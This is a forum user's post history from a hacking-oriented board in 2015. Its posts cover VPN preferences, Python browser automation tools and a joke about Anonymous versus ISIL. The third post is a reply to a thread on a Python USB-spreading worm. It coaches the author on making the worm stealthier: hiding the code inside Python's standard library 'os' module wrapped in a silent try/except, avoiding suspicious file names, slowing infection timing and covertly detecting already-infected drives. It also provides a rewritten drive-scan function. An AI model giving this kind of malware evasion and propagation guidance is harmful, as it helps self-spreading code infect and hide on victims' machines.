Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - NO_BOOT_DEVICE

Pages: [1]
1
Anonymity and Privacy / Re: vpn discussion
« on: November 20, 2015, 01:43:25 am »
Quote from: gray-fox on November 18, 2015, 04:31:03 pm
Tho, OP should have answered to his own questions to really start the discussion.
whoops! have to agree with inability here, cryptostorm rocks, though i usually have a few layers after that. :P

2
Scripting Languages / Re: [Python] Browser automation
« on: November 20, 2015, 01:38:42 am »
Quote
Last time i used the first two, the make the socket connection through python and make the python call by themselves. There are instance you are going to need a browser or look as one as closely as possible,
i don't see what it making the socket connection instead of using urllib or such has to do with it looking like a browser? you can very easily dress up mechanize as a browser, and while it won't get all the little things (and javascript), it can go far enough that most servers will be okay with it. only real use case for webdriver (the python module is selenium, yes, but webdriver is it's own W3 spec! ;)) i can see is for when the javascript can't be simply parsed of it's info, like recaptcha.

3
Scripting Languages / Re: Python based self-propagation [USB distribution]
« on: November 20, 2015, 01:17:35 am »
looks nice!
even though usb spreading doesn't work as well these days, it's still a good thing to learn about and still does work sometimes, so it is useful
you seem to know your stuff pretty well :P

a few thoughts i have:
on crawl(): you'd probably want to append to .py files before you get ahead of yourself and start porting to other languages
however, appending to py files doesn't work as well since it's just kinda self documenting code, which means it's easy for someone to look at and say "this looks fishy".
instead, here's an idea. check for the python lib files where all the default modules are stored, and hide yourself in one (os is a good one to choose) surrounded by a giant try except block so even if some code fails for some reason, the user doesn't see "valueerror in infectdrives()" and panic

Code: (python) [Select]
# Function used for hiding files (used in autorun.ini exploit)it's not an exploit, it's just a file that the os checks to see if the drive wants to run anything.
and i don't think you have to specify that it's used there, just do "# hides files"

Code: (python) [Select]
theDir = os.path.dirname(sys.executable) + "\\a.exe";
this was a little unwieldy, and depended on it being a.exe which probably would set off some alarm bells, so i looked around, and this should work
at top:
Code: (python) [Select]
from inspect import getsourcefile
from os.path import abspathreplacing that code:
Code: (python) [Select]
theDir=abspath(getsourcefile(lambda:0))
Code: (python) [Select]
if adriv == True:there are some scenarios where you absolutely need it to equal True and True only. this is not one, since all you want is a truthy value. "if adriv:" will work for checking if it's truthy, and "if not adriv:" will work for checking falsy.

also, on driveScan in general:
my opinion: driveScan should not contain your payload. it is called driveScan, it scans drives. that is it's goal.

driveScan should not at the least not include the drive infection function, instead it should only check os.path.isdir and then append the working ones to an array, that another function goes through. (infect(), maybe? ;P) the fact that it does contain drive infection makes changing the script to do what i'm about to say harder:

going through every drive on the system with a 1 second delay between drives and writing to them is, uh, bad. very bad. you want to wait a very long time (think in terms of instead of using a while loop you're using cronstyle scheduling) when you've scanned every drive. you also might want to look into this. it might be hard to do in python, but it'd make things a lot better. also, don't just write over and over again. try having ways to figure out if you have already touched it (if you want to think even sneakier, try doing that without using if file exists functions)

with those in mind, i have refined your drive scan function for you as a headstart:
Code: (python) [Select]
def drivescan():
  d = []
  for l in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
    d.append(os.path.isdir(l + ":\\"))
  return d

however, really, the most important thing is that you have fun. hacking should be fun, making scripts should be fun.
hope i helped! ;)

4
Scripting Languages / Re: [Python] Browser automation
« on: November 20, 2015, 12:34:09 am »
interesting way to do it and i'll definitely note that you can do this in the future.
but for further reference, most use-cases are covered by these 3, in ascending amount of browser-like-ness:
requests for python (urllib but not bad, if you're using ruby use httparty)
mechanize (i personally when using mechanize use the ruby version out of preference)
WebDriver (haven't used it before since i've always been able to use mechanize, but it's literally an api for controlling chrome or firefox)

5
Anonymity and Privacy / vpn discussion
« on: November 18, 2015, 01:15:08 pm »
what vpn do you use?
if you run your own, why and how?
otherwise, what do you think makes your vpn better?

people who say "none" or "hola" will be laughed at

6
General discussion / Re: Anonymous declares war on Isil
« on: November 18, 2015, 12:52:41 pm »
has anyone said it yet?
something something not the 72 virgins they were expecting  ;)

but seriously, someone wake me up if something other than skids getting lucky, FBI using anonymous as a front, or someone actually doing something neat and anonymous taking credit happens

Pages: [1]